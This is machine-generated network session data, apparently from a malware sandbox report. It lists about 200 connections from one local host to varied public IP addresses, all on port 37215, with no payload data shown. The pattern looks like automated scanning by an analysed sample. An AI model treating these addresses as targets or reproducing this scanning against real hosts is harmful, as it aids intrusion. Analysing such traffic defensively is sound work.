                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3225192.168.2.135785441.245.128.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3226192.168.2.135706241.15.25.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3227192.168.2.1342428199.59.63.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3228192.168.2.1349458185.219.205.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3229192.168.2.1339166223.123.100.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3230192.168.2.1338282116.181.225.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3231192.168.2.1346680197.169.17.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3232192.168.2.1344864120.125.130.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3233192.168.2.1333064197.184.13.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3234192.168.2.1335382157.160.118.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3235192.168.2.135814841.162.128.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3236192.168.2.1345012123.5.216.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3237192.168.2.136010260.235.168.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3238192.168.2.133783817.19.162.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3239192.168.2.1353908197.17.32.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3240192.168.2.1332780157.225.213.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3241192.168.2.1342784197.67.86.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3242192.168.2.133813041.26.73.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3243192.168.2.1344192204.224.14.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3244192.168.2.134379241.192.189.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3245192.168.2.134770441.200.167.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3246192.168.2.1350640197.96.137.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3247192.168.2.1334550173.108.53.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3248192.168.2.1360192197.11.75.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3249192.168.2.1340214157.131.190.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3250192.168.2.1333986202.233.45.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3251192.168.2.1344780157.71.93.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3252192.168.2.1339712197.117.157.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3253192.168.2.135006880.15.57.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3254192.168.2.1337768197.181.229.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3255192.168.2.1360338197.248.48.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3256192.168.2.135155641.70.69.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3257192.168.2.134229641.232.85.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3258192.168.2.1351346197.187.86.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3259192.168.2.1346674197.16.117.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3260192.168.2.1348488157.122.137.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3261192.168.2.1356224157.245.192.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3262192.168.2.1354896197.168.237.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3263192.168.2.134056623.38.3.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3264192.168.2.1346672149.162.31.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3265192.168.2.136014864.172.211.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3266192.168.2.134607441.98.174.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3267192.168.2.1343926157.57.83.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3268192.168.2.1338750157.164.247.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3269192.168.2.133519441.114.226.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3270192.168.2.1357464197.187.183.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3271192.168.2.1340806157.97.74.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3272192.168.2.1357738157.65.119.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3273192.168.2.135726090.234.187.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3274192.168.2.1358530157.170.4.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3275192.168.2.1346836104.139.92.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3276192.168.2.135178237.123.170.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3277192.168.2.1349468157.158.83.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3278192.168.2.1339886157.182.234.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3279192.168.2.1353808197.187.114.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3280192.168.2.1340386197.38.42.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3281192.168.2.1357312197.55.24.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3282192.168.2.1342700197.112.241.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3283192.168.2.1345002136.44.14.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3284192.168.2.13498162.25.84.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3285192.168.2.1359856197.61.33.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3286192.168.2.1359614197.181.28.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3287192.168.2.1339376197.112.143.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3288192.168.2.1358786197.17.145.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3289192.168.2.1343594197.13.70.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3290192.168.2.1338452197.36.152.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3291192.168.2.1341434194.119.5.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3292192.168.2.1333212157.84.111.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3293192.168.2.1358954135.95.169.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3294192.168.2.1334000197.55.250.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3295192.168.2.1341370149.203.216.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3296192.168.2.135090024.149.28.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3297192.168.2.134096041.141.89.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3298192.168.2.1342266197.214.95.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3299192.168.2.1343492197.156.199.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3300192.168.2.1337902157.32.43.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3301192.168.2.1349850174.3.53.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3302192.168.2.1345850197.163.102.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3303192.168.2.1360524157.150.19.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3304192.168.2.135260641.137.200.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3305192.168.2.1356458110.72.2.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3306192.168.2.1342354157.249.237.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3307192.168.2.1335070157.248.43.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3308192.168.2.1345194178.113.14.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3309192.168.2.1342952197.107.236.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3310192.168.2.1355544197.181.27.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3311192.168.2.1345784170.206.254.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3312192.168.2.1349568197.126.154.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3313192.168.2.1358726157.144.95.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3314192.168.2.1351448197.67.187.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3315192.168.2.134370459.13.187.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3316192.168.2.133690241.70.251.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3317192.168.2.1356610197.200.191.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3318192.168.2.1342176157.109.75.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3319192.168.2.1344860197.156.137.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3320192.168.2.1344392157.66.193.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3321192.168.2.133617441.141.92.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3322192.168.2.134703241.47.171.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3323192.168.2.1340818126.133.132.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3324192.168.2.1339402197.165.70.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3325192.168.2.1349170157.17.85.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3326192.168.2.1336390197.153.16.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3327192.168.2.1344758197.183.158.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3328192.168.2.134747682.244.181.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3329192.168.2.1337346157.216.141.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3330192.168.2.133730289.50.219.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3331192.168.2.1335216157.47.124.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3332192.168.2.13523269.61.102.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3333192.168.2.13431582.200.141.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3334192.168.2.13515604.249.39.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3335192.168.2.135582641.18.36.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3336192.168.2.135504641.45.104.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3337192.168.2.134660241.190.237.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3338192.168.2.1336312157.134.210.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3339192.168.2.1335598197.33.99.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3340192.168.2.1358012157.181.101.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3341192.168.2.135261091.95.12.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3342192.168.2.1334730197.136.233.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3343192.168.2.1347524157.138.235.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3344192.168.2.1333714157.198.165.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3345192.168.2.1334378157.46.250.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3346192.168.2.1348082139.17.158.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3347192.168.2.1333182157.65.239.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3348192.168.2.1353086197.141.161.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3349192.168.2.134863441.22.167.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3350192.168.2.135618441.78.204.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3351192.168.2.1356846197.233.91.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3352192.168.2.1352774157.170.169.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3353192.168.2.1359014157.191.75.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3354192.168.2.134712641.38.5.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3355192.168.2.1347916157.235.131.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3356192.168.2.1354844157.77.28.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3357192.168.2.1346026157.169.192.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3358192.168.2.133527041.105.14.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3359192.168.2.136057094.156.153.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3360192.168.2.1334706157.120.94.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3361192.168.2.1352884197.3.71.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3362192.168.2.135280841.170.32.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3363192.168.2.1347844118.228.201.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3364192.168.2.1347648197.188.202.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3365192.168.2.1339442106.178.40.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3366192.168.2.1343800157.234.186.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3367192.168.2.1354332157.74.7.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3368192.168.2.1334174157.217.125.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3369192.168.2.133326485.206.244.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3370192.168.2.1344972115.209.14.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3371192.168.2.134092841.73.219.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3372192.168.2.1342522185.250.101.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3373192.168.2.1342212157.243.166.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3374192.168.2.1348314197.106.133.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3375192.168.2.1333726157.39.77.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3376192.168.2.1337250197.224.52.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3377192.168.2.1338838157.240.150.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3378192.168.2.1336958220.12.239.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3379192.168.2.135268841.220.56.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3380192.168.2.1358482197.69.199.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3381192.168.2.1351568157.113.163.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3382192.168.2.1359570157.238.151.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3383192.168.2.133406441.232.95.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3384192.168.2.134056041.101.105.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3385192.168.2.135491241.34.227.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3386192.168.2.135233882.84.225.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3387192.168.2.1352572197.138.247.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3388192.168.2.1357476197.132.153.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3389192.168.2.133518612.176.232.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3390192.168.2.1354046197.179.220.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3391192.168.2.1348896157.20.51.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3392192.168.2.135858241.20.46.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3393192.168.2.135132641.180.216.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3394192.168.2.1346620157.143.124.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3395192.168.2.133566441.204.166.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3396192.168.2.1347160220.50.108.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3397192.168.2.1345906116.124.254.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3398192.168.2.1333424157.183.1.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3399192.168.2.134808818.120.63.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3400192.168.2.134497241.29.26.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3401192.168.2.1355814197.27.115.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3402192.168.2.1348918202.191.66.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3403192.168.2.135099041.60.193.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3404192.168.2.1353446157.228.38.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3405192.168.2.1341954128.129.227.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3406192.168.2.134022498.109.219.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3407192.168.2.1337186205.103.215.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3408192.168.2.1333896157.139.124.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3409192.168.2.1358772157.28.250.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3410192.168.2.1338088197.90.19.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3411192.168.2.1339276197.6.245.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3412192.168.2.1347866157.16.89.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3413192.168.2.1334602157.113.186.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3414192.168.2.1358020157.36.114.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3415192.168.2.1342860157.78.132.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3416192.168.2.1358070157.112.96.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3417192.168.2.1353346197.183.109.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3418192.168.2.135127641.81.93.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3419192.168.2.133647841.163.207.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3420192.168.2.134243841.63.190.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3421192.168.2.1351602157.12.43.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3422192.168.2.134225241.1.150.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3423192.168.2.1354328197.209.175.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3424192.168.2.1341402197.4.29.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3425192.168.2.1360082197.246.178.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3426192.168.2.1341762197.221.153.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3427192.168.2.134734436.212.144.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3428192.168.2.1339672197.186.110.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3429192.168.2.1333930157.232.157.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3430192.168.2.133881041.186.105.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3431192.168.2.1341936139.186.107.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3432192.168.2.133685841.92.199.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3433192.168.2.1354166197.79.128.16437215
                                                  TimestampBytes transferredDirectionData


